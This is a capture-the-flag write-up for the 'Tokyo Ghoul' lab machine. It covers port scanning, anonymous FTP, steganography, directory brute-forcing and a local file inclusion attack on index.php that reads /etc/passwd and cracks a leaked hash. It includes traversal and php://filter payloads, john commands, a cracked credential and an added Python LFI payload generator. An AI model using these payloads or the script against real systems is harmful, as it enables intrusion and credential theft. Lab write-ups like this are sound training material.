CTF Tokyo Ghoul

  1. nmap
  2. HTTP
  3. FTP
  4. Reverse
  5. Stegano
  6. decode
    1. CyberChef
    2. dcode.fr
    3. base64
  7. Web enumeration
  8. LFI
  9. root

nmap

nmap -sV -p- -T4 10.10.183.217  -vvv

Output:

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

HTTP

Nothing with gobuster.
There are a few notes that tell us to browse the FTP server.

FTP

wget -r ftp://anonymous@10.10.183.217


Users?

Rize San
Kaneki

Reverse

One ELF executable:

Strings on it:

Users?

kamishiro
Kaneki

rabin2 -z (radare2) lists the strings in the binary's data sections, which is handy for reversing.
I'm using dogbolt: https://dogbolt.org

Stegano

One image:

With steghide I can see another file; I'm using the password You_found_1t:
https://book.hacktricks.xyz/crypto-and-stego/stego-tricks

steghide info rize_and_kaneki.jpg


Extract it:

steghide extract -sf rize_and_kaneki.jpg --passphrase You_found_1t

decode

CyberChef

https://gchq.github.io/

dcode.fr

base64

echo ZDFyM2M3MHJ5X2NlbnRlcg== | base64 -d

Output:
d1r3c70ry_center

Web enumeration


I need to scan this directory:

gobuster dir -u http://10.10.183.217/d1r3c70ry_center/ -w /usr/share/wordlists/dirb/common.txt -x txt,php,html


10.10.183.217/d1r3c70ry_center/claim/
This box keeps crashing…

gobuster dir -u http://10.10.183.217/d1r3c70ry_center/claim -w /usr/share/wordlists/dirb/common.txt -x txt,php,html


10.10.183.217/d1r3c70ry_center/claim/contact-us.html
10.10.183.217/d1r3c70ry_center/claim/about-us.html

We have an email:
supersecurecompany@supersecurecompany.co
We add the domain to /etc/hosts.

LFI

Main page:

http://10.10.183.217/d1r3c70ry_center/claim/index.php?view=flower.gif

http://10.10.183.217/d1r3c70ry_center/claim/index.php?view=../../../../../etc/passwd

I need to bypass the WAF.
php://filter/convert.base64-encode/resource=../../../../../etc/passwd

https://raw.githubusercontent.com/emadshanab/LFI-Payload-List/master/LFI%20payloads.txt
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd

We have the user and the hash.
kamishiro:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:1001:1001:,,,:/home/kamishiro:/bin/bash
Crack it:

john --wordlist=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt pass.txt

kamishiro
password123
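The traversal, php://filter and dot-encoding steps above, gathered into one script, as an added example that is not part of the original writeup. It assumes a filter that matches the literal `../` sequence (the room's real check is not shown on this page), and the HTTP body it parses is constructed to stand in for the php://filter response; the only real data in it is the kamishiro line from the leaked /etc/passwd. The check worth keeping is the last one: a password field that starts with `$` instead of `x` means the box stores crypt hashes in the world-readable file, so the LFI alone is enough to start cracking.

```python
"""LFI helper: build `view=` payloads, decode php://filter output, and pull
crackable hashes out of a leaked /etc/passwd.

Added example for this writeup, not code from the original page or the room.
The encoded-traversal variants assume a WAF that matches the literal "../"
(an assumption); SAMPLE_BODY below is constructed, not captured from the box.
"""
import base64
import re
from urllib.parse import quote

# Only the kamishiro line is from the writeup; the other entries are filler.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "kamishiro:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET"
    "..it8r.jbrlpfZeMdwD3B0fGxJI0:1001:1001:,,,:/home/kamishiro:/bin/bash\n"
)

# Constructed stand-in for what index.php returns when `view=` is fed the
# php://filter payload: the file comes back base64-encoded inside the page.
SAMPLE_BODY = (
    "<html><body><h1>Claim</h1><p>"
    + base64.b64encode(SAMPLE_PASSWD.encode()).decode()
    + "</p></body></html>"
)

# $id$ prefix of a crypt(3) hash -> john's --format name.
PREFIX_TO_FORMAT = {
    "$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt",
}


def traversal_payloads(target="/etc/passwd", depth=5):
    """Values for the `view=` parameter, in the order the writeup tried them:
    plain traversal, php://filter (base64-encodes the file so PHP sources are
    returned instead of executed), then dot-encoded traversal for a filter
    that matches the literal "../" (assumed), plus a fully URL-encoded form."""
    rel = target.lstrip("/")
    plain = "../" * depth + rel
    return [
        plain,
        "php://filter/convert.base64-encode/resource=" + plain,
        "%2e%2e/" * depth + target,   # same shape as the writeup's working payload
        quote(plain, safe=""),        # dots kept, slashes encoded
    ]


def decode_filter_response(body):
    """Pull the base64 blob produced by php://filter out of the surrounding
    HTML and return the decoded file bytes. The longest base64-looking run is
    taken so short markup tokens are ignored."""
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not runs:
        raise ValueError("no base64 blob in response")
    return base64.b64decode(max(runs, key=len), validate=True)


def exposed_hashes(passwd_text):
    """Return {user: hash} for /etc/passwd entries whose password field holds
    a real crypt hash instead of the usual 'x' placeholder (hash in shadow)."""
    found = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[1].startswith("$"):
            found[fields[0]] = fields[1]
    return found


def john_format(crypt_hash):
    """Map the $id$ prefix to john's --format name; None if unrecognised."""
    for prefix, fmt in PREFIX_TO_FORMAT.items():
        if crypt_hash.startswith(prefix):
            return fmt
    return None


if __name__ == "__main__":
    for p in traversal_payloads("/etc/passwd", depth=8):
        print("view=" + p)
    leaked = decode_filter_response(SAMPLE_BODY).decode()
    for user, h in exposed_hashes(leaked).items():
        print(f"{user}: {h[:12]}...  -> john --format={john_format(h)} pass.txt")
```

Against the live target the payloads go into the `view=` parameter of the index.php shown above; when john autodetects the wrong algorithm for a `$6$` hash, pin it with `--format=sha512crypt`.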

root

We can use this script as root.

I'm gonna spawn a reverse shell.

I didn't have the time to save; the machine crashed again.
I really dislike this CTF, literally unplayable, I don't even know where the other flags are.

After 3 crashes I had no other choice.